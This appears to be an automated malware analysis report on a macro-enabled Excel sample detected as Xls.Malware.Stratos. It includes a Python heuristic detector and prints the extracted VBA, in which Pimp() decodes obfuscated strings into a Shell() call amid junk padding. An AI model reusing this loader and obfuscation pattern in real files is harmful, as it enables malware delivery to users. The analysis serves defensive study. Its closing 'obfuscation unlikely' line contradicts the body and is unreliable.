Verdict: MALICIOUS (risk score 200)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The critical heuristic OLE_VBA_SHELL flags a Shell() call in the VBA project. In the extracted module, the public subroutine Pimp() builds its command at run time: two pairs of string literals are passed through a decoder function (YoTpIoY3l) and the results are concatenated before being handed to Shell(). The decoder itself is not in the visible preview, so the decoded command cannot be read from this report; recovering it requires emulating the macro (for example with ViperMonkey) or instrumenting it in a sandbox. No auto-execution trigger such as Workbook_Open or Auto_Open appears in the preview either, so how Pimp() is invoked is not established here. The other visible procedures are junk code: identical DoEvents timing loops, GoTo statements that jump to the very next line, and If comparisons of two different string literals that can never be true. This padding inflates the module and dilutes signature matching without changing behavior. An obfuscated command passed to Shell() is the typical shape of a downloader or first-stage loader; the ClamAV signature Xls.Malware.Stratos-7506050-0 confirms a known family match but does not by itself identify the payload. Note that the findings listed below evidence only macro execution (T1059.005): there is no sign of an exploit, so the T1203 mapping above is not supported by these heuristics, and execution depends on the user enabling macros.
Heuristics (3)
- ClamAV: Xls.Malware.Stratos-7506050-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
- VBA project inside OOXML (medium, OOXML_VBA, 1 related finding): the document contains a VBA project, so VBA macros are present
- Shell() call in VBA (critical, OLE_VBA_SHELL): a Shell() call is present in the VBA source
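The two structural heuristics above, OOXML_VBA and OLE_VBA_SHELL, are simple enough to reproduce. The Python below is an added example, not the analyzer's or oletools' code: it checks an OOXML package for a vbaProject.bin part, then scans decoded VBA source for Shell() calls whose argument is assembled from a decoder function or by string concatenation, and counts the junk-code markers (constant If guards, DoEvents loops) seen in the Module1 preview. The .xlsm package and the VBA excerpt are constructed inline for the demo (the excerpt copies a few lines of the preview in this report); the regexes, the NOT_DECODERS list and the result field names are my own assumptions, not the analyzer's rules.

```python
"""Added example (not the analyzer's or oletools' code): reimplementing the
OOXML_VBA and OLE_VBA_SHELL heuristics over constructed input."""
import io
import re
import zipfile

# Parts that carry the macro project in Excel, Word and PowerPoint OOXML packages.
VBA_PROJECT_PARTS = ("xl/vbaProject.bin", "word/vbaProject.bin", "ppt/vbaProject.bin")


def build_fake_xlsm(with_vba: bool) -> bytes:
    """Constructed stand-in for an .xlsm: a zip with Excel part names. The
    vbaProject.bin body is dummy bytes; a real one is an OLE compound file
    holding the compressed VBA source (what olevba decodes into macros.bas)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        if with_vba:
            z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 64)
    return buf.getvalue()


def ooxml_has_vba(data: bytes) -> bool:
    """OOXML_VBA: an OOXML package carries macros only if it contains a
    vbaProject.bin part; the .xlsm/.docm extension is not authoritative."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
    return any(part in names for part in VBA_PROJECT_PARTS)


# Constructed VBA excerpt copying a few lines of the Module1 preview in this report.
SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Public Sub Pimp()
Y6 = YoTpIoY3l(" ? M < ", "imWrrmwfH")
Shell (Y6 + YoTpIoY3l("W=8Rv&9;; Y }", "mad8XKIgZ"))
End Sub
Private Sub kIBxIaoKxHfaDElFKS()
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
End Sub
'''

SHELL_RE = re.compile(r"\bShell\s*\(", re.IGNORECASE)
# An identifier applied to string-literal-only arguments, e.g. YoTpIoY3l("..", "..").
# The decoder's name is unknown in general, so any such user function is a candidate.
LITERAL_CALL_RE = re.compile(r'\b([A-Za-z_]\w*)\s*\(\s*"[^"]*"(?:\s*,\s*"[^"]*")*\s*\)')
# If "<lit>" = "<lit>" Then End: a guard whose outcome is fixed at compile time.
CONST_IF_RE = re.compile(r'^\s*If\s+"([^"]*)"\s*=\s*"([^"]*)"\s*Then\s+End\b', re.IGNORECASE)
DOEVENTS_RE = re.compile(r"^\s*DoEvents\s*:", re.IGNORECASE)
# Built-ins that legitimately take literal arguments and are not decoders (assumed list).
NOT_DECODERS = {"createobject", "environ", "getobject", "msgbox", "chr", "chrw"}


def _outside_literals(line: str) -> str:
    """Blank out string literals so operators inside them are not counted."""
    return re.sub(r'"[^"]*"', '""', line)


def scan_vba(src: str) -> dict:
    """OLE_VBA_SHELL plus supporting indicators over decoded VBA source.
    Line numbers are 1-based positions in `src`."""
    lines = src.splitlines()
    shell_lines = [n for n, line in enumerate(lines, 1) if SHELL_RE.search(line)]

    decoders = set()
    for line in lines:
        for m in LITERAL_CALL_RE.finditer(line):
            if m.group(1).lower() not in NOT_DECODERS:
                decoders.add(m.group(1))

    # A Shell() whose argument is built from a decoder result or by
    # concatenation (+ or &) outside literals is the obfuscated-command pattern in Pimp().
    obfuscated_shell = [
        n for n in shell_lines
        if any(d in lines[n - 1] for d in decoders)
        or re.search(r"[+&]", _outside_literals(lines[n - 1]))
    ]

    never_true_ifs = 0
    for line in lines:
        m = CONST_IF_RE.match(line)
        if m and m.group(1) != m.group(2):
            never_true_ifs += 1
    doevents_loops = sum(1 for line in lines if DOEVENTS_RE.match(line))

    return {
        "OLE_VBA_SHELL": bool(shell_lines),
        "shell_lines": shell_lines,
        "decoder_functions": sorted(decoders),
        "obfuscated_shell_lines": obfuscated_shell,
        "never_true_ifs": never_true_ifs,
        "doevents_loops": doevents_loops,
    }


if __name__ == "__main__":
    print("OOXML_VBA with project:", ooxml_has_vba(build_fake_xlsm(True)))
    print("OOXML_VBA without project:", ooxml_has_vba(build_fake_xlsm(False)))
    for key, value in scan_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On a real sample, feed `scan_vba` the output of `olevba --decode` (or oletools' `VBA_Parser.extract_macros()`) rather than a hand-copied excerpt, and treat `decoder_functions` as the list of routines to emulate first: the Shell() argument is only recoverable once those return.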
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 28690 bytes | 876de2fadf2904072d32dc58492b3aba65c238af6edcacedea4f566e5cb71f77 |

Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Public Sub Pimp()
Y6 = YoTpIoY3l(" ? M < ", "imWrrmwfH")
Shell (Y6 + YoTpIoY3l("W=8Rv&9;; Y }", "mad8XKIgZ"))
End Sub
Private Sub kIBxIaoKxHfaDElFKS()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
End Sub
Private Function MpuHEnAaaBJQySVnNoztLuQALRNZq()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
End Function
Public Function SwbZGvPFwKUDDq()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
End Function
Public Sub cieqGHdfoLsVmSZsApU()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
DoEvents
Next FyFkKwMPSKjMrbQLgQM
End Sub
Private Sub GtUrDRzQCGhURLebyTs()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
End Sub
Public Sub SQxQicusOkI()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop
End Sub
Private Function GLjqxbonDHKBbqjSA()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop
If "SOxLllLUhJdIgyYy" = "DVEcLVcYkAPQZiFAeMSmukPKKJOz" Then End
End Function
Public Function NeEETJMEdGljQFaQ()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop
If "SOxLllLUhJdIgyYy" = "DVEcLVcYkAPQZiFAeMSmukPKKJOz" Then End
GoTo NBBdlxatZwObOMGZVs
NBBdlxatZwObOMGZVs:
End Function
Public Sub nsoARSopyQ()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
... (truncated)

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 107008 bytes | 9f1e3794c339f2e9a0715f581ea2926bf7b8f6ffd89d96a82a57082e5ab592b7 |
Detection
- ClamAV: Xls.Malware.Stratos-7506050-0
- Obfuscation or payload: unlikely